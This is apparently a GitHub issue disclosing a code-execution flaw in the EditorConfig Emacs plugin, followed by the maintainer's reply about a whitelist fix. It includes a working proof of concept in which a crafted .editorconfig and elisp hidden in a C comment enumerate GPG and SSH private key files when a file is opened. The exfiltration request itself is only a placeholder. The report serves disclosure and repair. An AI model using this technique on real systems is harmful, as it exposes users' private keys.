Code execution with file_type_ext and file_type_emacs

[illikainen]

A malicious source tree can use the file_type_ext and file_type_emacs settings in .editorconfig to induce code execution by merely opening files with Emacs.

If e.g. file_type_ext is set to .el and file_type_emacs is set to flymake, any code in eval-when-compile is evaluated when Flymake runs its elisp backends.

.editorconfig

[*]
file_type_ext = el
file_type_emacs = flymake

foo.c

/*
(eval-when-compile
  (with-temp-file "~/bye-bye-keys"
    (dolist (x (append (directory-files "~/.gnupg/private-keys-v1.d/" t "^[^.]")
                       (directory-files "~/.ssh/" t "id_")))
      ;; <insert evil POST request to some shady API>
      (insert (format "could have shared %s with the world!\n" x)))))
*/

#include <stdio.h>

int main(void)
{
    printf("ohai\n");
}

~/poc$ cat ~/bye-bye-keys
cat: /home/hji/bye-bye-keys: No such file or directory
~/poc$ emacs foo.c
~/poc$ cat ~/bye-bye-keys
could have shared /home/hji/.gnupg/private-keys-v1.d/9598156881A8DFAE885F503AC61D6FD95A3A971A.key with the world!
could have shared /home/hji/.ssh/id_rsa with the world!
could have shared /home/hji/.ssh/id_rsa.pub with the world!
~/poc$

[10sr]

Thanks! I really appreciate you reporting this issue.

Yes, I've already heard of and read your blog post via SNS, and just added a mode whitelist in #204.
At least this will not happen any more because flymake-mode is a minor-mode, not a major-mode.

It is true that something similar to this could still happen with major-modes, but IMO it is not a matter of EditorConfig, because a major-mode could be enabled for arbitrary files.